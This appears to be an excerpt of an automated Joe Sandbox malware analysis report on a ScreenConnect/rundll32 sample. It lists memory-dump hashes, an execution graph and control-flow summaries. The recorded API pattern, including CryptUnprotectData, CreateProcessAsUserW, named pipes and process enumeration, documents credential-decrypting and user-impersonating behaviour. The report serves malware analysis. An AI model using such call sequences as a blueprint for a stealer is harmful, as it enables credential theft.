                                                                        • Instruction ID: 680770fe260f699f8daa10e7d0919020d3c44587b6e6224eaa3a9ad21858de91
                                                                        • Opcode Fuzzy Hash: 4bb573bca3ed226aa5cdd4cb7d5b95c604b33b01ba1166fed9f70c980f3ea2c4
                                                                        • Instruction Fuzzy Hash: 00D0233231021C3FB3006728D85982AF748F7852A13004833F802C3300CC707C0093CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000003.1392411677.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_3_4530000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 109cba6a7ef80ee62edbfc2c27eef8e4dcf9ee183e72b27207d591173cd2d072
                                                                        • Instruction ID: 22f8c3c003479a30320b805d30cebc26e479252c318c865c584e2772050a17e6
                                                                        • Opcode Fuzzy Hash: 109cba6a7ef80ee62edbfc2c27eef8e4dcf9ee183e72b27207d591173cd2d072
                                                                        • Instruction Fuzzy Hash: 03D01226F56B3577F70021B8385537A734CEB8D526F11A8A6FD19D7208EE65FC0022C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000003.1392411677.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_3_4530000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78eb77b9fc3c99099871eb23748d6f4d905819ad900d08f6174a8f5ff0bc4ab4
                                                                        • Instruction ID: 8939ac6c4706fdd278c520f481fc4307f477a4f060cd2982f129a56be434c577
                                                                        • Opcode Fuzzy Hash: 78eb77b9fc3c99099871eb23748d6f4d905819ad900d08f6174a8f5ff0bc4ab4
                                                                        • Instruction Fuzzy Hash: BFD05E70E1120CEFDB40EFA8EA0155EB7F9FB85204B1041A8D808E7241EA316F14AB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000003.1392411677.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_3_4530000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3d561eef087a7e0a58072da33e3c440f36ca437802ca9cf307c9a75888306e2f
                                                                        • Instruction ID: 1ada65d2fa61b6dc9e9ad43b75a26d688bd3248390c4b9951a780df8018de49c
                                                                        • Opcode Fuzzy Hash: 3d561eef087a7e0a58072da33e3c440f36ca437802ca9cf307c9a75888306e2f
                                                                        • Instruction Fuzzy Hash: 0DD05EB0A0030CEFDB40DFA8E90195EB7B9EB44209F1049B9D808E3220EE316F109B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000003.1392411677.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_3_4530000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6ffb4d84e4bf795fbbe84803ad68dcdc1d985566caa7d3fc826e9b11232154f
                                                                        • Instruction ID: 32fd29066181b98806d7408cf2e9be9f21bd3f7efe87c30f12826f5f3ae49f6f
                                                                        • Opcode Fuzzy Hash: d6ffb4d84e4bf795fbbe84803ad68dcdc1d985566caa7d3fc826e9b11232154f
                                                                        • Instruction Fuzzy Hash: 38C08CF28893802FD30202500CC08EEAF30B5A762538BD39BC080EA943C00CC0478230

                                                                        Execution Graph

                                                                        Execution Coverage:10.7%
                                                                        Dynamic/Decrypted Code Coverage:95.9%
                                                                        Signature Coverage:4.4%
                                                                        Total number of Nodes:315
                                                                        Total number of Limit Nodes:18
                                                                        execution_graph 51707 5c11b40 51708 5c11b71 51707->51708 51710 5c11bc7 51708->51710 51714 5c126ce 51708->51714 51719 5c126c1 51708->51719 51709 5c1254e 51709->51709 51725 5c157ef 51710->51725 51715 5c126d1 51714->51715 51716 5c1273c 51715->51716 51733 5c06088 51715->51733 51741 5c06079 51715->51741 51716->51710 51720 5c126cc 51719->51720 51721 5c126d1 51719->51721 51720->51710 51722 5c1273c 51721->51722 51723 5c06088 4 API calls 51721->51723 51724 5c06079 4 API calls 51721->51724 51722->51710 51723->51722 51724->51722 51726 5c1581e 51725->51726 51728 5c15837 51726->51728 51784 5c15950 51726->51784 51791 5c15960 51726->51791 51727 5c15860 51729 5c15950 2 API calls 51727->51729 51730 5c15960 2 API calls 51727->51730 51728->51709 51729->51728 51730->51728 51734 5c060ac 51733->51734 51736 5c060bc 51733->51736 51735 5c060b5 51734->51735 51737 5c061f8 4 API calls 51734->51737 51738 5c06208 4 API calls 51734->51738 51735->51716 51749 5c061f8 51736->51749 51756 5c06208 51736->51756 51737->51734 51738->51734 51743 5c060bc 51741->51743 51744 5c060ac 51741->51744 51742 5c060b5 51742->51716 51747 5c061f8 4 API calls 51743->51747 51748 5c06208 4 API calls 51743->51748 51744->51742 51745 5c061f8 4 API calls 51744->51745 51746 5c06208 4 API calls 51744->51746 51745->51744 51746->51744 51747->51744 51748->51744 51750 5c0622d 51749->51750 51752 5c0623d 51749->51752 51751 5c06236 51750->51751 51777 5c05010 51750->51777 51751->51734 51763 5c06388 51752->51763 51770 5c06378 51752->51770 51758 5c0622d 51756->51758 51759 5c0623d 51756->51759 51757 5c06236 51757->51734 51758->51757 51760 5c05010 ProcessIdToSessionId 51758->51760 51761 5c06388 2 API calls 51759->51761 51762 5c06378 2 API calls 51759->51762 51760->51758 51761->51758 51762->51758 51768 5c063b2 51763->51768 51769 5c0639f 51763->51769 51764 5c063a8 51764->51750 51765 5c0651a K32EnumProcesses 51766 5c06552 51765->51766 51766->51750 51768->51769 51780 5c0501c 51768->51780 51769->51764 51769->51765 51775 5c063b2 51770->51775 51776 5c0639f 51770->51776 51771 5c063a8 51771->51750 51772 5c0651a K32EnumProcesses 51773 5c06552 51772->51773 51773->51750 51774 5c0501c K32EnumProcesses 51774->51775 51775->51774 51775->51776 51776->51771 51776->51772 51778 5c065c0 ProcessIdToSessionId 51777->51778 51779 5c06633 51778->51779 51779->51750 51781 5c064c8 K32EnumProcesses 51780->51781 51783 5c06552 51781->51783 51783->51768 51785 5c15954 51784->51785 51787 5c159a4 51785->51787 51798 5c13854 51785->51798 51802 5c034e8 51787->51802 51806 5c034e1 51787->51806 51795 5c1596d 51791->51795 51792 5c13854 WaitNamedPipeW 51792->51795 51793 5c159a4 51796 5c034e1 CreateFileA 51793->51796 51797 5c034e8 CreateFileA 51793->51797 51794 5c159af 51794->51727 51795->51792 51795->51793 51796->51794 51797->51794 51799 5c159c8 WaitNamedPipeW 51798->51799 51801 5c15a44 51799->51801 51801->51785 51803 5c034fb 51802->51803 51810 5c02bd4 51803->51810 51807 5c034e8 51806->51807 51808 5c02bd4 CreateFileA 51807->51808 51809 5c03520 51808->51809 51809->51727 51811 5c03538 CreateFileA 51810->51811 51813 5c0366d 51811->51813 52049 5c13d80 52050 5c13dd3 CreateProcessAsUserW 52049->52050 52052 5c13e64 52050->52052 52053 5c1f084 52054 5c1eaa9 52053->52054 52055 42fb808 CreateNamedPipeW 52054->52055 52056 42fb818 CreateNamedPipeW 52054->52056 52058 5c00448 52054->52058 52055->52054 52056->52054 52059 5c00490 52058->52059 52060 5c004da 52059->52060 52062 5c00a0f 52059->52062 52064 5c00566 52060->52064 52069 5c00448 CryptUnprotectData 52060->52069 52061 5c00a43 52061->52054 52062->52061 52063 5c00b61 52062->52063 52067 5c00448 CryptUnprotectData 52062->52067 52070 5c00c68 52062->52070 52074 5c0007c 52063->52074 52064->52054 52067->52063 52069->52064 52071 5c00c7d 52070->52071 52072 5c0007c CryptUnprotectData 52071->52072 52073 5c00d2c 52072->52073 52073->52063 52075 5c00d48 CryptUnprotectData 52074->52075 52076 5c00d2c 52075->52076 52076->52054 52016 5c12467 52017 5c12472 52016->52017 52019 5c157ef 2 API calls 52017->52019 52018 5c1254e 52018->52018 52019->52018 52020 4371c90 52021 4371cb4 52020->52021 52022 4371cc4 52020->52022 52023 4371cbd 52021->52023 52026 4371eb0 CreateNamedPipeW 52021->52026 52027 4371ec0 CreateNamedPipeW 52021->52027 52028 4371eb0 52022->52028 52036 4371ec0 52022->52036 52026->52021 52027->52021 52029 4371eb5 52028->52029 52030 4371ee3 52029->52030 52034 42fb808 CreateNamedPipeW 52029->52034 52035 42fb818 CreateNamedPipeW 52029->52035 52031 4371eec 52030->52031 52032 42fb808 CreateNamedPipeW 52030->52032 52033 42fb818 CreateNamedPipeW 52030->52033 52031->52021 52032->52030 52033->52030 52034->52030 52035->52030 52037 4371ef3 52036->52037 52039 4371ee3 52036->52039 52040 42fb808 CreateNamedPipeW 52037->52040 52041 42fb818 CreateNamedPipeW 52037->52041 52038 4371eec 52038->52021 52039->52038 52042 42fb808 CreateNamedPipeW 52039->52042 52043 42fb818 CreateNamedPipeW 52039->52043 52040->52039 52041->52039 52042->52039 52043->52039 52077 1ad4c6a 52079 1ad4c90 52077->52079 52078 1ad4cc6 52079->52078 52080 1ad4d1d RtlGetVersion 52079->52080 52081 1ad4dda 52080->52081 51814 5c155d8 51815 5c155d9 ConnectNamedPipe 51814->51815 51817 5c15668 51815->51817 51817->51817 51818 1ad36b0 51820 1ad36c6 51818->51820 51819 1ad3764 51820->51819 51824 42fa0d8 51820->51824 51831 42fa0a7 51820->51831 51821 1ad3739 51826 42fa0f7 51824->51826 51825 42fa11e 51825->51821 51826->51825 51838 42fa588 51826->51838 51833 42fa0b5 51831->51833 51832 42fa078 51832->51821 51833->51832 51835 42fa588 CreateNamedPipeW 51833->51835 51834 42fa164 51836 42fc98c CryptProtectData 51834->51836 51837 42fc990 CryptProtectData 51834->51837 51835->51834 51836->51832 51837->51832 51840 42fa5be 51838->51840 51839 42fa164 51843 42fc98c 51839->51843 51847 42fc990 51839->51847 51840->51839 51850 42faa40 51840->51850 51858 42faa50 51840->51858 51844 42fc990 51843->51844 51986 42fc9cc 51844->51986 51845 42fc9b5 51845->51825 51849 42fc9cc CryptProtectData 51847->51849 51848 42fc9b5 51848->51825 51849->51848 51851 42faa50 51850->51851 51866 42fb66a 51851->51866 51871 42fb670 51851->51871 51852 42fad1f 51852->51852 51853 42faca7 51853->51852 51876 42fc7d8 51853->51876 51880 42fc7c0 51853->51880 51859 42faa7e 51858->51859 51864 42fb66a CreateNamedPipeW 51859->51864 51865 42fb670 CreateNamedPipeW 51859->51865 51860 42fad1f 51860->51860 51861 42faca7 51861->51860 51862 42fc7d8 CreateNamedPipeW 51861->51862 51863 42fc7c0 CreateNamedPipeW 51861->51863 51862->51861 51863->51861 51864->51861 51865->51861 51867 42fb670 51866->51867 51868 42fb6e3 51867->51868 51885 42fb808 51867->51885 51899 42fb818 51867->51899 51868->51853 51872 42fb694 51871->51872 51873 42fb6e3 51872->51873 51874 42fb808 CreateNamedPipeW 51872->51874 51875 42fb818 CreateNamedPipeW 51872->51875 51873->51853 51874->51873 51875->51873 51877 42fc7db 51876->51877 51878 42fc2f0 CreateNamedPipeW 51877->51878 51879 42fc825 51878->51879 51879->51853 51882 42fc7c3 51880->51882 51881 42fc7cb 51881->51853 51882->51881 51883 42fc2f0 CreateNamedPipeW 51882->51883 51884 42fc825 51883->51884 51884->51853 51886 42fb818 51885->51886 51888 42fb83b 51886->51888 51889 42fb808 CreateNamedPipeW 51886->51889 51893 42fb818 CreateNamedPipeW 51886->51893 51913 42fb9a0 51886->51913 51923 42f615a 51886->51923 51928 4370608 51886->51928 51935 42fb990 51886->51935 51945 42f6158 51886->51945 51950 4370618 51886->51950 51887 42fb844 51887->51868 51888->51887 51897 4370618 CreateNamedPipeW 51888->51897 51898 4370608 CreateNamedPipeW 51888->51898 51889->51888 51893->51888 51897->51888 51898->51888 51900 42fb83b 51899->51900 51901 42fb84b 51899->51901 51902 42fb844 51900->51902 51903 4370618 CreateNamedPipeW 51900->51903 51904 4370608 CreateNamedPipeW 51900->51904 51901->51900 51905 42fb808 CreateNamedPipeW 51901->51905 51906 42fb9a0 CreateNamedPipeW 51901->51906 51907 4370618 CreateNamedPipeW 51901->51907 51908 42f615a CreateNamedPipeW 51901->51908 51909 42fb818 CreateNamedPipeW 51901->51909 51910 42f6158 CreateNamedPipeW 51901->51910 51911 42fb990 CreateNamedPipeW 51901->51911 51912 4370608 CreateNamedPipeW 51901->51912 51902->51868 51903->51900 51904->51900 51905->51900 51906->51900 51907->51900 51908->51900 51909->51900 51910->51900 51911->51900 51912->51900 51914 42fb9c3 51913->51914 51915 42fb9d3 51913->51915 51920 42fb9cc 51914->51920 51957 42fbe10 51914->51957 51961 42fbe20 51914->51961 51916 42fb808 CreateNamedPipeW 51915->51916 51917 42fb818 CreateNamedPipeW 51915->51917 51918 42fb9a0 CreateNamedPipeW 51915->51918 51919 42fb990 CreateNamedPipeW 51915->51919 51916->51914 51917->51914 51918->51914 51919->51914 51920->51888 51924 42f617d 51923->51924 51925 42f6189 51923->51925 51924->51888 51925->51924 51926 4370618 CreateNamedPipeW 51925->51926 51927 4370608 CreateNamedPipeW 51925->51927 51926->51924 51927->51924 51930 437064c 51928->51930 51931 437063c 51928->51931 51929 4370645 51929->51888 51933 42fb808 CreateNamedPipeW 51930->51933 51934 42fb818 CreateNamedPipeW 51930->51934 51931->51929 51982 4372459 51931->51982 51933->51931 51934->51931 51936 42fb9a0 51935->51936 51937 42fb9c3 51936->51937 51941 42fb808 CreateNamedPipeW 51936->51941 51942 42fb818 CreateNamedPipeW 51936->51942 51943 42fb9a0 CreateNamedPipeW 51936->51943 51944 42fb990 CreateNamedPipeW 51936->51944 51938 42fb9cc 51937->51938 51939 42fbe20 CreateNamedPipeW 51937->51939 51940 42fbe10 CreateNamedPipeW 51937->51940 51938->51888 51939->51938 51940->51938 51941->51937 51942->51937 51943->51937 51944->51937 51946 42f6189 51945->51946 51947 42f617d 51945->51947 51946->51947 51948 4370618 CreateNamedPipeW 51946->51948 51949 4370608 CreateNamedPipeW 51946->51949 51947->51888 51948->51947 51949->51947 51952 437064c 51950->51952 51953 437063c 51950->51953 51951 4370645 51951->51888 51955 42fb808 CreateNamedPipeW 51952->51955 51956 42fb818 CreateNamedPipeW 51952->51956 51953->51951 51954 4372459 CreateNamedPipeW 51953->51954 51954->51951 51955->51953 51956->51953 51958 42fbe20 51957->51958 51965 42fc2f0 51958->51965 51959 42fbeb1 51959->51920 51962 42fbe3f 51961->51962 51964 42fc2f0 CreateNamedPipeW 51962->51964 51963 42fbeb1 51963->51920 51964->51963 51966 42fc316 51965->51966 51969 5c147f0 51965->51969 51973 5c147e0 51965->51973 51966->51959 51970 5c147f1 51969->51970 51971 5c14825 51970->51971 51977 5c14830 51970->51977 51971->51966 51974 5c147e4 51973->51974 51975 5c14830 CreateNamedPipeW 51974->51975 51976 5c14825 51974->51976 51975->51976 51976->51966 51978 5c1483d 51977->51978 51980 5c14a51 CreateNamedPipeW 51978->51980 51981 5c14a60 CreateNamedPipeW 51978->51981 51979 5c14898 51979->51971 51980->51979 51981->51979 51983 4372498 51982->51983 51984 43724b3 51983->51984 51985 42fc2f0 CreateNamedPipeW 51983->51985 51984->51929 51985->51984 51987 42fc9ed 51986->51987 51988 42fc9f9 51986->51988 51987->51845 51992 42fcfc8 51988->51992 52000 42fcfd8 51988->52000 51989 42fca75 51989->51845 51993 42fcfd8 51992->51993 51996 42fd0c4 51993->51996 51998 42fcfc8 CryptProtectData 51993->51998 51999 42fcfd8 CryptProtectData 51993->51999 52008 42fd22e 51993->52008 52012 42fcc94 51996->52012 51998->51996 51999->51996 52001 42fcffd 52000->52001 52004 42fd0c4 52000->52004 52001->52004 52005 42fd22e CryptProtectData 52001->52005 52006 42fcfc8 CryptProtectData 52001->52006 52007 42fcfd8 CryptProtectData 52001->52007 52002 42fcc94 CryptProtectData 52003 42fd2ed 52002->52003 52003->51989 52004->52002 52005->52004 52006->52004 52007->52004 52008->52008 52009 42fd232 52008->52009 52010 42fcc94 CryptProtectData 52009->52010 52011 42fd2ed 52010->52011 52011->51996 52013 42fd4d8 CryptProtectData 52012->52013 52015 42fd2ed 52013->52015 52015->51989 52044 1ad7490 52045 1ad74ba 52044->52045 52046 1ad74d5 52045->52046 52047 42fb808 CreateNamedPipeW 52045->52047 52048 42fb818 CreateNamedPipeW 52045->52048 52047->52046 52048->52046 52082 5c1443c 52083 5c13fd0 52082->52083 52084 5c1405d 52083->52084 52085 4372459 CreateNamedPipeW 52083->52085 52085->52084

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 617 1ad4c6a-1ad4cb3 622 1ad4cb5-1ad4cc4 call 1ad4848 617->622 623 1ad4d02-1ad4d08 617->623 626 1ad4d09-1ad4dd8 RtlGetVersion 622->626 627 1ad4cc6-1ad4ccb 622->627 632 1ad4dda-1ad4de0 626->632 633 1ad4de1-1ad4e24 626->633 639 1ad4cce call 1ad52e8 627->639 640 1ad4cce call 1ad52f8 627->640 628 1ad4cd4 628->623 632->633 637 1ad4e2b-1ad4e32 633->637 638 1ad4e26 633->638 638->637 639->628 640->628
                                                                        APIs
                                                                        • RtlGetVersion.NTDLL(0000009C), ref: 01AD4DBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2622774140.0000000001AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1ad0000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: Version
                                                                        • String ID:
                                                                        • API String ID: 1889659487-0
                                                                        • Opcode ID: 45e8b306307e163aa3bf8d687714ae2fa4ed02f9939d5ce50f6b4836d7e6835c
                                                                        • Instruction ID: 3faeecc567c19ac465f97ffbc52fb3419c97962a179d1b34239be6e31c48badf
                                                                        • Opcode Fuzzy Hash: 45e8b306307e163aa3bf8d687714ae2fa4ed02f9939d5ce50f6b4836d7e6835c
                                                                        • Instruction Fuzzy Hash: 6741AD71A003589FEB609F68C844BADBBB5FF49300F0045E9D54DA7380DB745A89CF92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 653 5c13d80-5c13dd1 654 5c13dd3-5c13dd9 653->654 655 5c13ddc-5c13de0 653->655 654->655 656 5c13de2-5c13de5 655->656 657 5c13de8-5c13dfd 655->657 656->657 658 5c13e0b-5c13e62 CreateProcessAsUserW 657->658 659 5c13dff-5c13e08 657->659 660 5c13e64-5c13e6a 658->660 661 5c13e6b-5c13e93 658->661 659->658 660->661
                                                                        APIs
                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C13E4F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessUser
                                                                        • String ID:
                                                                        • API String ID: 2217836671-0
                                                                        • Opcode ID: da769556f5589ec144d9f2c19337afa4cae8205e90acbc349ece77816b6670fe
                                                                        • Instruction ID: a0efea1548803e2caff3bcaf4c945f4afbe24cb0c1a30cf0e23dd859b87d5e06
                                                                        • Opcode Fuzzy Hash: da769556f5589ec144d9f2c19337afa4cae8205e90acbc349ece77816b6670fe
                                                                        • Instruction Fuzzy Hash: 4C411576900249DFCF11CFA9C884ADEBBF1FF48310F15882AE918A7250D375AA55DF94
                                                                        APIs
                                                                        • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05C14C24
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateNamedPipe
                                                                        • String ID:
                                                                        • API String ID: 2489174969-0
                                                                        • Opcode ID: 74e45fedb62cd951780c0e2538b2c4eb8cf9dbed0bbe83da8857cb1123d14717
                                                                        • Instruction ID: b28ce74c2d0383068c9b27ce2674a7fa2637e76f0745ecc0d36d66b84de088ed
                                                                        • Opcode Fuzzy Hash: 74e45fedb62cd951780c0e2538b2c4eb8cf9dbed0bbe83da8857cb1123d14717
                                                                        • Instruction Fuzzy Hash: 5D3124B5800348DFDB14CF9AD584B8EBBF5BF48314F148469E918AB221D376A855CF54
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,00000001,?,?), ref: 05C00DAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID:
                                                                        • API String ID: 834300711-0
                                                                        • Opcode ID: a14375bb5273da8f7e708172f851e8b5487cfc0fc4abc78e175c19eeb25d24b9
                                                                        • Instruction ID: 9889292a3a63b0e78e20c58f2a238158b71562d3941a5a7a901a8c86935b7cb4
                                                                        • Opcode Fuzzy Hash: a14375bb5273da8f7e708172f851e8b5487cfc0fc4abc78e175c19eeb25d24b9
                                                                        • Instruction Fuzzy Hash: EA219AB680438A9FDB11CF99C805BDEBFF0EF48310F058459D954A7251C335A555CBA1
                                                                        APIs
                                                                        • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 042FD54E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645374226.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_42f0000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataProtect
                                                                        • String ID:
                                                                        • API String ID: 3091777813-0
                                                                        • Opcode ID: 07e2146a5c463dd729e0a3c1937003033beb21873bf4d2a374a57c19073f509c
                                                                        • Instruction ID: dc5d1428dc182782271868d4fc9b2014eb9e49b7a3751db81a9770cc649c7147
                                                                        • Opcode Fuzzy Hash: 07e2146a5c463dd729e0a3c1937003033beb21873bf4d2a374a57c19073f509c
                                                                        • Instruction Fuzzy Hash: F22145B691024A9FDB10CF9AC844BDEBBF1FF88310F148429EA19A7240D375A595CFA1
                                                                        APIs
                                                                        • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 042FD54E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645374226.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_42f0000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataProtect
                                                                        • String ID:
                                                                        • API String ID: 3091777813-0
                                                                        • Opcode ID: 04157284d743199856ed5bddd2e736a5343c770603f64b0dc16ec80154a49f16
                                                                        • Instruction ID: 2406f69fb29fbdc867dfba7553b995351362ddaec1b149590070e944e85c295c
                                                                        • Opcode Fuzzy Hash: 04157284d743199856ed5bddd2e736a5343c770603f64b0dc16ec80154a49f16
                                                                        • Instruction Fuzzy Hash: 7B2148B680024A9FDB11CF9AC844BDEFBF1FF48310F14842AE965A7250D335A595CFA1
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,00000001,?,?), ref: 05C00DAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID:
                                                                        • API String ID: 834300711-0
                                                                        • Opcode ID: 10b5ae03d4c7e409425cc5fe96de31cbcd1e75ff42644b6048477ec3ab962dca
                                                                        • Instruction ID: 5edfafd5631a9886284ed7f91d3a477ca7a2b7b0d5fef75dc21447275177c1f7
                                                                        • Opcode Fuzzy Hash: 10b5ae03d4c7e409425cc5fe96de31cbcd1e75ff42644b6048477ec3ab962dca
                                                                        • Instruction Fuzzy Hash: 642147BA800249DFDB10CF99C845BEEBBF4EF48310F158459E914B7250D379A991CFA5
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,00000001,?,?), ref: 05C00DAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CryptDataUnprotect
                                                                        • String ID:
                                                                        • API String ID: 834300711-0
                                                                        • Opcode ID: 8a225275e8f8ee14a7679ed16d5680e9a99f5d40cc1153c3c9ecfaef85e0a667
                                                                        • Instruction ID: d7d31f3bcb01cc415019c6de468b924e1c7228b9454da2f13ebfe9e5fd35b936
                                                                        • Opcode Fuzzy Hash: 8a225275e8f8ee14a7679ed16d5680e9a99f5d40cc1153c3c9ecfaef85e0a667
                                                                        • Instruction Fuzzy Hash: 282147B6800249DFDB10CF99C845BEEBBF4EF48310F148419E914A7250D339A591CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 520 5c06388-5c0639d 521 5c063b2-5c063b9 520->521 522 5c0639f-5c063a2 520->522 523 5c063be-5c06402 call 5c0501c 521->523 524 5c063a8-5c063b1 522->524 525 5c0646c-5c06480 522->525 543 5c06407-5c0640c 523->543 526 5c06482 525->526 527 5c06446-5c0644f 525->527 531 5c0648e-5c06497 526->531 529 5c06451-5c0646b 527->529 530 5c064ac-5c0650e 527->530 534 5c06510-5c06518 530->534 535 5c0651a-5c06550 K32EnumProcesses 530->535 534->535 536 5c06552-5c06558 535->536 537 5c06559-5c06581 535->537 536->537 544 5c06412-5c06415 543->544 545 5c06498-5c064a5 543->545 546 5c06484-5c06489 544->546 547 5c06417-5c06444 544->547 545->530 546->523 547->527 547->531
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c844b4bc011c3c26251e3b3edfc616a29a05db22ebceb9190de267136c1650b
                                                                        • Instruction ID: 7a58b3936c81339ed70afbfc2283feb2b24e835539c6de38aee92d3359e4da68
                                                                        • Opcode Fuzzy Hash: 5c844b4bc011c3c26251e3b3edfc616a29a05db22ebceb9190de267136c1650b
                                                                        • Instruction Fuzzy Hash: A2518E71A007058FDB20CFA9D884AAEB7F1FF88310F14892ED45AE7790D734A955CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 552 5c02bd3-5c03594 554 5c03596-5c035bb 552->554 555 5c035e8-5c0366b CreateFileA 552->555 554->555 558 5c035bd-5c035bf 554->558 562 5c03674-5c036b2 555->562 563 5c0366d-5c03673 555->563 560 5c035c1-5c035cb 558->560 561 5c035e2-5c035e5 558->561 564 5c035cd 560->564 565 5c035cf-5c035de 560->565 561->555 570 5c036c2 562->570 571 5c036b4-5c036b8 562->571 563->562 564->565 565->565 566 5c035e0 565->566 566->561 573 5c036c3 570->573 571->570 572 5c036ba 571->572 572->570 573->573
                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C03655
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 9f0ffbb1b6ca3ac2e3585fb9cff05d836d0c8b4a92732063c7a9ede6a423c026
                                                                        • Instruction ID: 1b4942b86e811234c452c63c9dda86c4972d8dad4a5b4eee645e0617183258b5
                                                                        • Opcode Fuzzy Hash: 9f0ffbb1b6ca3ac2e3585fb9cff05d836d0c8b4a92732063c7a9ede6a423c026
                                                                        • Instruction Fuzzy Hash: 795169B1D042899FDB10CFA9C944B9DBBF1FF48704F248829E818AB3A0D7759945CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
